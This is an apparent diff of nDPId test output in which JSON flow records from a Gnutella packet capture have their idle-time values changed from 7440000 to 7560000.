-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88706,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.44.190.145","src_port":28681,"dst_port":10170,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.44.190.145","src_port":28681,"dst_port":10170,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87671,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":84593,"flow_last_seen":93622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":253025,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.209","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":253025,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.209","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73301,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":74328,"flow_last_seen":83345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.27.193.6","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.27.193.6","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
